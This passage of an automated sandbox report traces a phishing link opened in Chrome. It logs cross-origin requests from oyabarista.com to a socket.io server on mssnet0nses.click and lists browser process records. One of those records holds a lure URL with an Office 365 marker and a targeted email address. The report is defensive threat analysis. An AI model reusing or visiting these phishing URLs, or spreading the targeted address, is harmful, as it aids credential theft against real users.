                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f7ac8e742fd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83291&min_rtt=83269&rtt_var=17581&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36693&cwnd=252&unsent_bytes=0&cid=5c48f6f16a2ef5df&ts=303&x=0"
                                                        2025-03-27 13:42:20 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        149192.168.2.549908172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:21 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrkYN HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:21 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:21 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lgxurrPXYzMfvQeO6%2BvZNrwEtFfIkoD5GMq09m5Iqq%2FJW2MZapq%2FooACeajdMJnKLS2wCfhoqIlXhevLPC7tHjuAgckIy8ttTpE4cS7xVARRePUC30k3GIBGf6iGuUlHyyG4%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f82afa78c77-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83732&min_rtt=83711&rtt_var=17695&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36468&cwnd=242&unsent_bytes=0&cid=647bd7b69d2dc3a0&ts=268&x=0"


                                                        020406080s020406080100

                                                        Click to jump to process

                                                        020406080s0.0050100MB

                                                        Click to jump to process

                                                        Target ID:5
                                                        Start time:09:41:03
                                                        Start date:27/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff7017b0000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:09:41:08
                                                        Start date:27/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2080 /prefetch:3
                                                        Imagebase:0x7ff7017b0000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:09:41:12
                                                        Start date:27/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5032 /prefetch:8
                                                        Imagebase:0x7ff7017b0000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:09:41:15
                                                        Start date:27/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com"
                                                        Imagebase:0x7ff7017b0000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        No disassembly